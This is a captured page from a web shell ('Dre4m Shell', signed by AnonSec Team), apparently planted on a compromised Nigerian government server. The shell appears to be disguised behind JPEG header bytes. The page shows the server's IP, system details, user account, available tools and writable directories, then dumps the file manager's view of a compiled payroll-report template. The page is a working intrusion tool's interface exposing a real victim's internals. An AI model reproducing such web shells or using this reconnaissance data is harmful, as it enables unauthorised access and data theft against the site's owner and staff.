ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.129.247.40
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/2f237225065eb102026bee0d4cebdbf45e4641d5.php
<?php $__env->startSection('pageTitle'); ?>
Payroll Report
<?php $__env->stopSection(); ?>
<?php $__env->startSection('content'); ?>

  <div class="box-body">
    <div class="row">
      <div class="col-md-12">
        <p class="text-center">SUMMARY OF <?php echo e($summary[0]->month); ?> <?php echo e($summary[0]->year); ?> SALARY</p>
        <table border="1" width="900px" cellspacing="6">
          <th>S/No</th>
          <th>Division</th>
          <th>Gross Pay</th>
          <th>Total Deduction</th>
          <th>Total Net Pay</th>
          <?php $i = 1;?>
          <?php $__currentLoopData = $summary; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $s): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
          <tr>
            <td><?php echo $i; $i++; ?></td>
            <td><?php echo e($s->division); ?></td>
            <td align="right"><?php echo e(number_format($s->grosspay, 2, '.', ',')); ?></td>
            <td align="right"><?php echo e(number_format($s->grosspay-$s->totalEmolu, 2, '.', ',')); ?></td>
            <td align="right"><?php echo e(number_format($s->totalEmolu, 2, '.', ',')); ?></td>
          </tr>
          <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
        </table>
      </div>     
    </div>
  </div><!-- /.col -->
</div><!-- /.row -->

<?php $__env->stopSection(); ?>
<?php $__env->startSection('styles'); ?>
<style type="text/css">
  p.text-center { font-size: 18px; font-weight: bolder;
  }
  table { font-size: 16px; border: solid thin 1px #000; }
  td, th { padding: 1px 4px }
</style>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<style type="text/css" media="print">
  /*  body
    {
        display: none;
        visibility: hidden;
    }*/
</style>
<?php $__env->stopSection(); ?>
<?php $__env->startSection('scripts'); ?>

<script type="text/javascript" language="javascript">
      /*  $(function() {
            $(this).bind("contextmenu", function(e) {
                e.preventDefault();
            });
        }); */
</script>
<script type="text/javascript">
   /* $(document).ready(function(){
    
        function copyToClipboard() {
  // Create a "hidden" input
  var aux = document.createElement("input");
  // Assign it the value of the specified element
  aux.setAttribute("value", "Você não pode mais dar printscreen. Isto faz parte da nova medida de segurança do sistema.");
  // Append it to the body
  document.body.appendChild(aux);
  // Highlight its content
  aux.select();
  // Copy the highlighted text
  document.execCommand("copy");
  // Remove it from the body
  document.body.removeChild(aux);
  //ert("Print screen desabilitado.");
}

$(window).keyup(function(e){
  if(e.keyCode == 44){
    copyToClipboard();
  }
}); 




    });*/
</script>

<?php $__env->stopSection(); ?>



<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/auditSummaryReport/summary.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team